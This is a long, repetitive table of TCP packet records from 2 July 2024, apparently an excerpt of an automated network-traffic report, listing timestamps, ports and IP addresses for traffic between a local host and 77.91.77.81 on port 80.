                                            Jul 2, 2024 08:26:35.897959948 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.897974014 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.897974968 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.897989035 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.897999048 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.898005009 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.898005009 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.898010969 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.898022890 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.898025036 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.898035049 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.898046970 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.898047924 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.898058891 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.898072004 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.898082972 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.898094893 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.898094893 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.898094893 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.898113012 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.898170948 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.956995964 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.957034111 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.957046032 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.957067013 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.957067013 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.957101107 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.957118034 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.957129002 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.957144022 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.957155943 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.957160950 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.957160950 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.957179070 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.957197905 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.957329035 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.957341909 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.957354069 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.957365990 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.957415104 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.957415104 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.957415104 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.957415104 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.957513094 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.957525969 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.957539082 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.957570076 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.957570076 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.957627058 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.957638025 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.957663059 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.957680941 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.957755089 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.957767010 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.957777977 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.957788944 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.957801104 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.957802057 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.957824945 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.957865000 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.957951069 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.957986116 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.990464926 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.990494013 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.990505934 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.990515947 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.990535975 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.990545034 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.990545034 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.990549088 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.990561962 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.990586042 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.990586042 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.990622997 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.990641117 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.990706921 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.990726948 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.990740061 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.990767956 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.990783930 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.990847111 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.990859032 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.990869045 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.990880966 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.990885019 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.990895987 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.990904093 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.990931988 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.990947008 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.991133928 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.991147041 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.991159916 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.991166115 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.991189003 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.991198063 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.991198063 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.991202116 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.991214037 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.991224051 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.991245031 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.991280079 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.991466045 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.991512060 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.991524935 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.991539001 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.991571903 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.991636992 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.991648912 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.991661072 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.991671085 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.991678953 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.991678953 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.991694927 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.991796017 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.991842985 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.991915941 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.991928101 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.991966009 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.991966009 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.992048979 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.992060900 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.992073059 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.992084026 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.992091894 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.992115974 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.992130041 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.992342949 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.992360115 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.992372036 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.992458105 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.992458105 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.992503881 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.992518902 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.992530107 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.992542982 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.992546082 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.992650032 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.992650032 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.992669106 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.992681026 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.992692947 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.992701054 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.992703915 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.992731094 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.992731094 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.992747068 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.992830038 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.992841959 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.992854118 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.992870092 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.992877007 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.992877007 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.992883921 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.992896080 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.992906094 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.992911100 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.992919922 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.992949009 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.992949009 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.993217945 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.993240118 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.993252039 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.993268967 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.993278980 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.993278980 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.993282080 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.993294954 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.993302107 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.993302107 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.993334055 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.993334055 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.993380070 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.993391991 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.993429899 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.993429899 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.993508101 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.993520975 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.993531942 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.993544102 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.993547916 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.993556023 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.993566990 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.993578911 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.993582964 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.993582964 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.993582964 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.993592024 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.993598938 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.993618011 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.993647099 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.993891001 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.993901968 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.993912935 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.993925095 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.993933916 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.993937016 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.993964911 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.993964911 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.994067907 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.994210005 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.994223118 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.994232893 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.994244099 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.994256020 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.994265079 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.994265079 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.994267941 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.994282961 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.994293928 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.994306087 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.994317055 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.994330883 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.994330883 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.994330883 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.994348049 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.994393110 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.994718075 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.994730949 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.994743109 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.994760036 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.994771957 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.994782925 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.994782925 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.994782925 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.994782925 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.994792938 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.994796991 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.994807959 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.994818926 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:35.994820118 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.994833946 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:35.994865894 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.051809072 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.051829100 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.051842928 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.051871061 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.051892042 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.051974058 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.051986933 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.051999092 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.052011013 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.052028894 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.052030087 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.052078009 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.052115917 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.052129030 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.052139997 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.052151918 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.052175045 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.052194118 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.052198887 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.052212000 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.052222967 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.052242994 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.052269936 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.052416086 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.052426100 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.052437067 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.052473068 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.052473068 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.052546024 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.052557945 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.052570105 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.052587032 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.052603006 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.052603006 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.052622080 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.085238934 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.085261106 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.085274935 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.085295916 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.085323095 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.085331917 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.085345984 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.085360050 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.085401058 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.085419893 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.085443974 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.085457087 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.085469961 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.085489988 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.085510969 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.085539103 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.085552931 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.085565090 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.085573912 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.085577965 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.085597038 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.085627079 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.085685968 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.085700035 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.085712910 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.085726976 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.085750103 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.085750103 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.085820913 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.085839033 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.085865021 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.085875988 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.085891008 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.085901022 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.085901976 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.085901022 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.085930109 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.085931063 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.085963011 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.086066961 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.086082935 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.086106062 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.086128950 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.086282015 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.086294889 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.086307049 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.086327076 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.086332083 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.086332083 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.086343050 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.086355925 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.086366892 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.086366892 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.086369038 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.086383104 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.086384058 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.086384058 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.086415052 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.086450100 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.086468935 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.086513996 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.086536884 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.086549997 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.086591005 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.086591005 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.086688042 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.086702108 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.086735964 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.086766005 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.086793900 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.086806059 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.086828947 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.086838961 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.086838961 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.086839914 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.086857080 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.086869001 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.086879969 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.086922884 CEST6388180192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:36.086945057 CEST806388177.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:36.086958885 CEST806388177.91.77.81192.168.2.4
